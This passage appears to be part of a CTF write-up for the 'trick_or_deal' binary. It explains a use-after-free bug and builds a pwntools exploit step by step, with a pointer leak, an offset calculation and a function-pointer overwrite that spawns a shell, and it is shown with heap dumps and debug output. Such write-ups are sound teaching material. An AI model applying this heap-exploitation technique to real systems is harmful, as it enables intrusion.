</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">fprintf</span>(stdout,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">%s[*] Bruteforcing Storage Access Code . . .%s</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x1b</span><span style="color:#e6db74">[5;32m&#34;</span>,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x1b</span><span style="color:#e6db74">[25;0m&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">sleep</span>(<span style="color:#ae81ff">2</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">fprintf</span>(stdout,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">%s* Storage Door Opened *%s</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x1b</span><span style="color:#e6db74">[1;32m&#34;</span>,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x1b</span><span style="color:#e6db74">[1;0m&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">system</span>(<span style="color:#e6db74">&#34;sh&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h2 id="recap">Recap</h2>
<p>The binary has a variable <strong><code>storage</code></strong> that holds some <em>ASCII data</em> and a <strong>pointer</strong> to <code>printStorage()</code>. The binary also has a secret function <code>unlock_storage()</code> that gives us a shell.</p>
<ul>
<li>Action <strong>1</strong> will <strong>follow the pointer</strong> in <code>storage</code> to call <code>printStorage()</code>. This prints the data of <code>storage</code>.</li>
<li>Action <strong>3</strong> <em>malloc()</em> an arbitrary sized chunk, and write data into this new memory.</li>
<li>Action <strong>4</strong> <em>free()</em> the variable <code>storage</code>.</li>
</ul>
<blockquote>
<p>If you haven&rsquo;t solved the binary yet. Stop here, and try to exploit the binary.</p></blockquote>
<h2 id="the-bug">The Bug</h2>
<p>We have a <strong>Use-After-Free</strong> bug, which means that the program does not check if the memory has been free when we call the functions. Here we have a possibility to realloc data of our own, and still use the <em>action 1</em> that call the pointer present on the heap.</p>
<h2 id="the-exploit">The exploit</h2>
<p>Our strategy is to <strong>replace</strong> the pointer to <code>printStorage()</code> with a pointer to <code>unlock_storage()</code>.</p>
<p>Since the binary is protected with <em>ASLR</em>, we first need to <strong>leak</strong> the <code>printStorage()</code> pointer. We can then calculate the address of <code>unlock_storage()</code> by adding the needed <em>offset</em> to our <em>leaked pointer</em>.</p>
<p>Fist let&rsquo;s create an exploit skeleton use the <code>pwn template</code> command of pwntools.</p>
<pre><code>$ pwn template trick_or_deal
</code></pre>
<p>And let&rsquo;s add a few helper functions, to make or exploit development easier.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Python" data-lang="Python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># coding: utf-8</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Create a new pane the Tilix terminal emulator when using the GDB option</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># context.terminal = [&#39;tilix&#39;,&#39;--action=session-add-right&#39;, &#39;-e&#39;]</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Set up pwntools for the correct architecture</span>
</span></span><span style="display:flex;"><span>exe <span style="color:#f92672">=</span> context<span style="color:#f92672">.</span>binary <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#39;trick_or_deal&#39;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Many built-in settings can be controlled on the command line and show up</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># in &#34;args&#34;.  For example, to dump all data sent/received, and disable ASLR</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># for all created processes.</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># ./exploit.py DEBUG NOASLR</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">start</span>(argv<span style="color:#f92672">=</span>[], <span style="color:#f92672">*</span>a, <span style="color:#f92672">**</span>kw):
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#39;&#39;&#39;Start the exploit against the target.&#39;&#39;&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> args<span style="color:#f92672">.</span>GDB:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> gdb<span style="color:#f92672">.</span>debug([exe<span style="color:#f92672">.</span>path] <span style="color:#f92672">+</span> argv, gdbscript<span style="color:#f92672">=</span>gdbscript, <span style="color:#f92672">*</span>a, <span style="color:#f92672">**</span>kw)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> process([exe<span style="color:#f92672">.</span>path] <span style="color:#f92672">+</span> argv, <span style="color:#f92672">*</span>a, <span style="color:#f92672">**</span>kw)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Specify your GDB script here for debugging</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># GDB will be launched if the exploit is run via e.g.</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># ./exploit.py GDB</span>
</span></span><span style="display:flex;"><span>gdbscript <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">tbreak main
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">continue
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;&#39;&#39;</span><span style="color:#f92672">.</span>format(<span style="color:#f92672">**</span>locals())
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#===========================================================</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#                    EXPLOIT GOES HERE</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#===========================================================</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Arch:     amd64-64-little</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># RELRO:    Full RELRO</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Stack:    Canary found</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># NX:       NX enabled</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># PIE:      PIE enabled</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># RUNPATH:  b&#39;./glibc/&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Helper functions</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">free</span>():
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] What do you want to do?&#39;</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;4&#39;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">malloc</span>(size, data):
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] What do you want to do?&#39;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;3</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#39;</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] Are you sure that you want to make an offer(y/n): &#39;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;y</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#39;</span>)
</span></span><span style="display:flex;"><span>    
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] How long do you want your offer to be?&#39;</span>, <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">{</span>size<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span><span style="color:#f92672">.</span>encode())
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] What can you offer me? &#39;</span>, data)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>io <span style="color:#f92672">=</span> start()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>interactive()
</span></span></code></pre></div><h3 id="leak-address">Leak address</h3>
<p>We free the initial buffer, and we malloc enough data to bridge the pointer we aim to leak. By leaving no space before the variable, it will be printed when we call <code>printStorage()</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Python" data-lang="Python"><span style="display:flex;"><span>io <span style="color:#f92672">=</span> start()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>free()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># We don&#39;t overwrite the function pointer so that we can leak it.</span>
</span></span><span style="display:flex;"><span>payload <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x48</span> <span style="color:#f92672">*</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;Y&#39;</span>
</span></span><span style="display:flex;"><span>malloc(<span style="color:#ae81ff">0x58</span>, payload)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Leak pointer</span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] What do you want to do? &#39;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;1&#39;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>leak <span style="color:#f92672">=</span> u64(io<span style="color:#f92672">.</span>readline()[:<span style="color:#ae81ff">6</span>] <span style="color:#f92672">+</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\x00\x00</span><span style="color:#e6db74">&#39;</span>)
</span></span><span style="display:flex;"><span>log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;printStorage leak: </span><span style="color:#e6db74">{</span>hex(leak)<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>interactive()
</span></span></code></pre></div><p>Note that the chunk is of size <em>0x60</em>, so we malloc <em>0x58</em> as malloc add <em>8</em> bytes for chunk metadata.</p>
<p>Initially the heap looked like this :</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;"><font color="#F92672"><b>pwndbg&gt; </b></font>vis_heap_chunks 2 0x555555603290 

0x555555603290  <font color="#F4BF75">0x0000000000000000</font> <font color="#A1EFE4">0x0000000000000061</font> <font color="#A1EFE4">........a.......</font>
0x5555556032a0  <font color="#A1EFE4">0x67694c206568540a</font> <font color="#A1EFE4">0x0a72656261737468</font> <font color="#A1EFE4">.The Lightsaber.</font>
0x5555556032b0  <font color="#A1EFE4">0x6e6f53206568540a</font> <font color="#A1EFE4">0x7765726353206369</font> <font color="#A1EFE4">.The Sonic Screw</font>
0x5555556032c0  <font color="#A1EFE4">0x0a0a726576697264</font> <font color="#A1EFE4">0x0a73726573616850</font> <font color="#A1EFE4">driver..Phasers.</font>
0x5555556032d0  <font color="#A1EFE4">0x696f4e206568540a</font> <font color="#A1EFE4">0x6b63697243207973</font> <font color="#A1EFE4">.The Noisy Crick</font>
0x5555556032e0  <font color="#A1EFE4">0x00000000000a7465</font> <font color="#A1EFE4">0x0000555555400be6</font> <font color="#A1EFE4">et........@UUU..</font>
0x5555556032f0  <font color="#A1EFE4">0x0000000000000000</font> <font color="#AE81FF">0x0000000000020d11</font> <font color="#AE81FF">................</font>    &lt;-- Top chunk
</code></pre></div>


<p>We can run our script with debugging options <code>$ ./xpl.py NOASLR DEBUG GDB</code>.</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;"><font color="#F92672"><b>pwndbg&gt; </b></font>vis_heap_chunks 2 0x555555603290 

0x555555603290  <font color="#F4BF75">0x0000000000000000</font> <font color="#A1EFE4">0x0000000000000061</font> <font color="#A1EFE4">........a.......</font>
0x5555556032a0  <font color="#A1EFE4">0x5959595959595959</font> <font color="#A1EFE4">0x5959595959595959</font> <font color="#A1EFE4">YYYYYYYYYYYYYYYY</font>
0x5555556032b0  <font color="#A1EFE4">0x5959595959595959</font> <font color="#A1EFE4">0x5959595959595959</font> <font color="#A1EFE4">YYYYYYYYYYYYYYYY</font>
0x5555556032c0  <font color="#A1EFE4">0x5959595959595959</font> <font color="#A1EFE4">0x5959595959595959</font> <font color="#A1EFE4">YYYYYYYYYYYYYYYY</font>
0x5555556032d0  <font color="#A1EFE4">0x5959595959595959</font> <font color="#A1EFE4">0x5959595959595959</font> <font color="#A1EFE4">YYYYYYYYYYYYYYYY</font>
0x5555556032e0  <font color="#A1EFE4">0x5959595959595959</font> <font color="#A1EFE4">0x0000555555400be6</font> <font color="#A1EFE4">YYYYYYYY..@UUU..</font>
0x5555556032f0  <font color="#A1EFE4">0x0000000000000000</font> <font color="#AE81FF">0x0000000000020d11</font> <font color="#AE81FF">................</font> &lt;-- Top chunk
</code></pre></div>


<p>We have filled the buffer with <code>'Y'</code> and there is no  <code>'\x00'</code> left that would indicate a <em>end of file</em>.
The pointer will be considered as part of the string and will be printed when we call <code>printStorage()</code>.</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;">    b&apos;[*] What do you want to do? &apos;
[<font color="#F92672"><b>DEBUG</b></font>] Sent 0x2 bytes:
    b&apos;1\n&apos;
[<font color="#F92672"><b>DEBUG</b></font>] Received 0x17a bytes:
    00000000  <font color="#F92672">0a</font> <font color="#66D9EF">1b</font> 5b 31  3b 33 32 6d  57 65 61 70  6f 6e 73 20  │<font color="#F92672">·</font><font color="#66D9EF">·</font>[1<font color="#66D9EF">│</font>;32m<font color="#66D9EF">│</font>Weap<font color="#66D9EF">│</font>ons │
    00000010  69 6e 20 73  74 6f 63 6b  3a 20 <font color="#F92672">0a</font> 20  59 59 59 59  │in s<font color="#66D9EF">│</font>tock<font color="#66D9EF">│</font>: <font color="#F92672">·</font> <font color="#66D9EF">│</font>YYYY│
    00000020  59 59 59 59  59 59 59 59  59 59 59 59  59 59 59 59  │YYYY<font color="#66D9EF">│</font>YYYY<font color="#66D9EF">│</font>YYYY<font color="#66D9EF">│</font>YYYY│
    *
    00000060  59 59 59 59  <font color="#66D9EF">e6</font> <font color="#66D9EF">0b</font> 40 55  55 55 20 <font color="#66D9EF">1b</font>  5b 31 3b 33  │YYYY<font color="#66D9EF">│··</font>@U<font color="#66D9EF">│</font>UU <font color="#66D9EF">·│</font>[1;3│
    *
[<font color="#66D9EF"><b>*</b></font>] printStorage leak: 0x555555400be6
[<font color="#66D9EF"><b>*</b></font>] Switching to interactive mode
</code></pre></div>


<h3 id="calculate-the-offset">Calculate the Offset</h3>
<p>First, let&rsquo;s use <em>gdb</em> to see the address of each function.</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;"><font color="#F92672"><b>pwndbg&gt; </b></font>p printStorage 
$1 = {&lt;text variable, no debug info&gt;} <font color="#66D9EF">0x555555400be6</font> &lt;<font color="#F4BF75">printStorage</font>&gt;
<font color="#F92672"><b>pwndbg&gt; </b></font>p unlock_storage 
$2 = {&lt;text variable, no debug info&gt;} <font color="#66D9EF">0x555555400eff</font> &lt;<font color="#F4BF75">unlock_storage</font>&gt;
</code></pre></div>


<p>Now, let&rsquo;s calculate the offset between the two functions with <em>python</em>.</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;">$ python3
Python 3.10.6 (main, Nov 14 2022, 16:10:14) [GCC 11.3.0] on linux
>>> hex(0x555555400eff - 0x555555400be6)
'0x319'
</code></pre></div>


<p>Now we just have to add this value to the leaked pointer to calculate the address of <code>unlock_storage()</code>.
Let&rsquo;s add this to our exploit script.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python3" data-lang="python3"><span style="display:flex;"><span>leak <span style="color:#f92672">=</span> u64(io<span style="color:#f92672">.</span>readline()[:<span style="color:#ae81ff">6</span>] <span style="color:#f92672">+</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\x00\x00</span><span style="color:#e6db74">&#39;</span>)
</span></span><span style="display:flex;"><span>log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;printStorage leak: </span><span style="color:#e6db74">{</span>hex(leak)<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>unlock_storage <span style="color:#f92672">=</span> leak <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x319</span>
</span></span><span style="display:flex;"><span>log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;unlock_storage: </span><span style="color:#e6db74">{</span>hex(unlock_storage)<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>interactive()
</span></span></code></pre></div><h3 id="overwrite-the-function-pointer">Overwrite the function pointer</h3>
<p>Now we can overwrite the pointer to <code>printStorage()</code> with a pointer to <code>unlock_storage()</code>.</p>
<p>Let&rsquo;s <em>free()</em> the buffer using our helper function, then fill it with <em>0x48</em> chars and overwrite the function pointer.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Python3" data-lang="Python3"><span style="display:flex;"><span><span style="color:#75715e"># overwrite printStorage with unlock_storage</span>
</span></span><span style="display:flex;"><span>free()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>payload <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;V&#39;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x48</span> <span style="color:#f92672">+</span> p64(unlock_storage)
</span></span><span style="display:flex;"><span>malloc(<span style="color:#ae81ff">0x50</span>, payload)
</span></span></code></pre></div><p>Our heap look like this now.</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;"><font color="#F92672"><b>pwndbg&gt; </b></font>vis 1 0x555555603290

0x555555603290  <font color="#F4BF75">0x0000000000000000</font> <font color="#A1EFE4">0x0000000000000061</font> <font color="#A1EFE4">........a.......</font>
0x5555556032a0  <font color="#A1EFE4">0x5656565656565656</font> <font color="#A1EFE4">0x5656565656565656</font> <font color="#A1EFE4">VVVVVVVVVVVVVVVV</font>
0x5555556032b0  <font color="#A1EFE4">0x5656565656565656</font> <font color="#A1EFE4">0x5656565656565656</font> <font color="#A1EFE4">VVVVVVVVVVVVVVVV</font>
0x5555556032c0  <font color="#A1EFE4">0x5656565656565656</font> <font color="#A1EFE4">0x5656565656565656</font> <font color="#A1EFE4">VVVVVVVVVVVVVVVV</font>
0x5555556032d0  <font color="#A1EFE4">0x5656565656565656</font> <font color="#A1EFE4">0x5656565656565656</font> <font color="#A1EFE4">VVVVVVVVVVVVVVVV</font>
0x5555556032e0  <font color="#A1EFE4">0x5656565656565656</font> <font color="#A1EFE4">0x0000555555400eff</font> <font color="#A1EFE4">VVVVVVVV..@UUU..</font>
0x5555556032f0  <font color="#A1EFE4">0x0000000000000000</font> <font color="#AE81FF">0x0000000000020d11</font> <font color="#AE81FF">................</font>  &lt;-- Top chun
</code></pre></div>


<h3 id="call-unlock_storage">Call <code>unlock_storage()</code></h3>
<p>All that&rsquo;s left to do is to call the function pointer, with the first action.</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;">[*] What do you want to do? <font color="#F92672"><b>$</b></font> 1

<blink><font color="#A6E22E">[*] Bruteforcing Storage Access Code . . .</font></blink>

<font color="#A6E22E"><b>* Storage Door Opened *</b></font>
<font color="#F92672"><b>$</b></font> id
uid=1000(kali) gid=1000(kali) groups=1000(kali)
</code></pre></div>


<p>Add this ultimate step, and we have a complete exploit.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python3" data-lang="python3"><span style="display:flex;"><span>io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] What do you want to do? &#39;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;1&#39;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>interactive()
</span></span></code></pre></div><h3 id="remote-option">Remote option</h3>
<p>It&rsquo;s nice to have a REMOTE option to target the ctf server. I generally modify the <code>start()</code> function of the exploit script with this option.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python3" data-lang="python3"><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">start</span>(argv<span style="color:#f92672">=</span>[], <span style="color:#f92672">*</span>a, <span style="color:#f92672">**</span>kw):
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#39;&#39;&#39;Start the exploit against the target.&#39;&#39;&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> args<span style="color:#f92672">.</span>GDB:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> gdb<span style="color:#f92672">.</span>debug([exe<span style="color:#f92672">.</span>path] <span style="color:#f92672">+</span> argv, gdbscript<span style="color:#f92672">=</span>gdbscript, <span style="color:#f92672">*</span>a, <span style="color:#f92672">**</span>kw)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">elif</span> args<span style="color:#f92672">.</span>REMOTE: <span style="color:#75715e"># (&#39;server:port&#39;)</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> remote(sys<span style="color:#f92672">.</span>argv[<span style="color:#ae81ff">1</span>]<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#39;:&#39;</span>)[<span style="color:#ae81ff">0</span>], sys<span style="color:#f92672">.</span>argv[<span style="color:#ae81ff">1</span>]<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#39;:&#39;</span>)[<span style="color:#ae81ff">1</span>])
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> process([exe<span style="color:#f92672">.</span>path] <span style="color:#f92672">+</span> argv, <span style="color:#f92672">*</span>a, <span style="color:#f92672">**</span>kw)
</span></span></code></pre></div><h2 id="final">Final</h2>
<p>Below the full exploit script.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Python3" data-lang="Python3"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># -*- coding: utf-8 -*-</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># This exploit template was generated via:</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># $ pwn template trick_or_deal</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>terminal <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#39;tilix&#39;</span>, <span style="color:#e6db74">&#39;--action=session-add-right&#39;</span>, <span style="color:#e6db74">&#39;-e&#39;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Set up pwntools for the correct architecture</span>
</span></span><span style="display:flex;"><span>exe <span style="color:#f92672">=</span> context<span style="color:#f92672">.</span>binary <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#39;trick_or_deal&#39;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Many built-in settings can be controlled on the command line and show up</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># in &#34;args&#34;.  For example, to dump all data sent/received, and disable ASLR</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># for all created processes...</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># ./exploit.py DEBUG NOASLR</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">start</span>(argv<span style="color:#f92672">=</span>[], <span style="color:#f92672">*</span>a, <span style="color:#f92672">**</span>kw):
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#39;&#39;&#39;Start the exploit against the target.&#39;&#39;&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> args<span style="color:#f92672">.</span>GDB:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> gdb<span style="color:#f92672">.</span>debug([exe<span style="color:#f92672">.</span>path] <span style="color:#f92672">+</span> argv, gdbscript<span style="color:#f92672">=</span>gdbscript, <span style="color:#f92672">*</span>a, <span style="color:#f92672">**</span>kw)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">elif</span> args<span style="color:#f92672">.</span>REMOTE: <span style="color:#75715e"># (&#39;server:port&#39;)</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> remote(sys<span style="color:#f92672">.</span>argv[<span style="color:#ae81ff">1</span>]<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#39;:&#39;</span>)[<span style="color:#ae81ff">0</span>], sys<span style="color:#f92672">.</span>argv[<span style="color:#ae81ff">1</span>]<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#39;:&#39;</span>)[<span style="color:#ae81ff">1</span>])
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> process([exe<span style="color:#f92672">.</span>path] <span style="color:#f92672">+</span> argv, <span style="color:#f92672">*</span>a, <span style="color:#f92672">**</span>kw)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Specify your GDB script here for debugging</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># GDB will be launched if the exploit is run via e.g.</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># ./exploit.py GDB</span>
</span></span><span style="display:flex;"><span>gdbscript <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">set glibc 2.31
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">#tbreak main
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">continue
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;&#39;&#39;</span><span style="color:#f92672">.</span>format(<span style="color:#f92672">**</span>locals())
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#===========================================================</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#                    EXPLOIT GOES HERE</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#===========================================================</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Arch:     amd64-64-little</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># RELRO:    Full RELRO</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Stack:    Canary found</span>
